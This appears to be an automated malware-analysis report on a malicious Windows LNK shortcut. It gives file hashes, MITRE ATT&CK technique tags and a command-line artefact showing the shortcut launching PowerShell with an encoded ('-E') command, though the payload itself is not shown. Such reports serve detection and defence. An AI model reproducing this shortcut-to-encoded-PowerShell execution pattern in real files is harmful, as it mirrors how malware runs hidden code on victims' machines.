Malicious

8d78c893822e5b176b828b7a86ad11dd

LNK File | MD5: 8d78c893822e5b176b828b7a86ad11dd | Size: 3.32 KB | application/x-ms-shortcut

LNK
Malicious
LOLBin
LOLBin:powershell.exe
Execution: CMD in LNK
T1059.003
T1202: Indirect Command Execution
T1204.002
Execution: PowerShell in LNK
T1059.001
PowerShell
Batch Command
PowerShell Call
DeObfuscated

Characteristics
Hash: Hash Value
MD5: 8d78c893822e5b176b828b7a86ad11dd
Sha1: 7db70859572c3d76df989e97238ecd5ca93c1c3b
Sha256: 4a061fd8f386dcc579f97e6e57437f132c1a2d7f177c3c99de5dc6f0f789b772
Sha384: 6464b627762a1c28414862aceb0c104cb16b74fe062fcdd1e68d91bc065b43f017f939893a7c37bb6159fc8f0dc22686
Sha512: aeff36706c1796b6f23b1b50add3c7993782bef9667ab5e341d96ca0ef158354e1ff83670df37f91313ea9b4e87203dc7c5597ea38de21b6876de52398960c47
SSDeep: 24:8Ayw/BHYVKVWO+/CWFO0uvk7LeHQpCHXC/TMVa3vnuzJm0sHCEJMdd79dsHqThOr:8y5apTGk7LZY3C/QU3vyJUiuMdJ91Ir
TLSH: 676142280AF601FEFA73D6B997F976F34866FBC38C3595BC108067424722500B463A7A
File Structure
8d78c893822e5b176b828b7a86ad11dd
LNK
Malicious
LOLBin
LOLBin:powershell.exe
Execution: CMD in LNK
T1059.003
T1202: Indirect Command Execution
T1204.002
Execution: PowerShell in LNK
T1059.001
PowerShell
Batch Command
PowerShell Call
DeObfuscated
Malicious
LNK CommandLine
PowerShell
Batch Command
PowerShell Call
Contains Base64 Block
Base64 Block
DeObfuscated
Malicious
[PowerShell Command]
PowerShell
DeObfuscated
Contains Base64 Block
Base64 Block
Malicious
[Deobfuscated PS]
DeObfuscated
PowerShell
Malicious
[Base64-Block]
Base64 Block
[Lnk Summary]
Malicious
Artefacts
Name
Value
LNK: Command Execution

powershell.exe powershell -E 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

Deobfuscated PowerShell

-e "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"
